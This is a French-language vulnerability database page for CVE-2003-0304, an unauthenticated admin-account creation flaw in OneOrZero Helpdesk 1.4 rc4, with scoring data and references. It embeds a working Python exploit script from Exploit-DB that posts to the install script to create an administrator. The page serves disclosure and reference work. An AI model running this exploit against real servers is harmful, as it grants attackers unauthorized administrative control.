CVE-2003-0304 : Détail

CVE-2003-0304

2.86%V4
Network
2003-05-17
02h00 +00:00
2016-10-17
11h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

one||zero (aka One or Zero) Helpdesk 1.4 rc4 allows remote attackers to create administrator accounts by directly calling the install.php Helpdesk Installation script.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 10 AV:N/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 22606

Date de publication : 2003-05-14 22h00 +00:00
Auteur : frog
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/7611/info OneOrZero Helpdesk has been reported prone to an issue that may result in an attacker obtaining unauthorized administrative access. The issue presents itself due to a programming error in a Helpdesk script. Reportedly a script does not sufficiently check if an instance of OneOrZero Helpdesk has already been installed. import urlparse import httplib import string OneOrZero("http://www.target.com","80","NewUserName","NewPassword") class OneOrZero: def __init__(self,target,port,user,password): if port != "": self.port=str(port) else : self.port="80" self.path=str(urlparse.urlparse(target)[2]) self.target=str(urlparse.urlparse(target)[1]) self.user=str(user) self.password=str(password) self.USER_AGENT='OneOrZero.py' self.CreateAdminAccount() def CreateAdminAccount(self): data='step=2&first=admin&last=admin&user='+self.user+'&pwd1='+self.password+'&pwd2='+self.password+'&email=a@a.a&office=abcd' try : print "Connecting On "+self.target+"...\n" http=httplib.HTTP(self.target,self.port) print "Sending Data On "+self.target+"...\n" http.putrequest("POST",self.path+"/admin/install.php") http.putheader("Content-Type","application/x-www-form-urlencoded") http.putheader("User-Agent",self.USER_AGENT) http.putheader("Host",self.target) http.putheader("Content-Length",str(len(data))) http.endheaders() http.send(data) code,msg,headers = http.getreply() print "HTTP Code : ",str(code) print "HTTP Connection : ",msg print "HTTP headers : \n",headers,"\n" file=http.getfile() if string.find(file.read(),"Administrator Account Created Successfully.") != -1: print "Congratulations, Administrator Account Created Successfully." print "You Can Log In Here : http://"+self.target+self.path+"/admin/control.php" print "User : ",self.user print "Password : ",self.password else : print "Administrator Account Hasn't Been Created." except : print "Error During Admin Account Creation."

Products Mentioned

Configuraton 0

Oneorzero>>Oneorzero_helpdesk >> Version 1.4_rc4

    Références

    http://marc.info/?l=bugtraq&m=105302025601231&w=2
    Tags : mailing-list, x_refsource_BUGTRAQ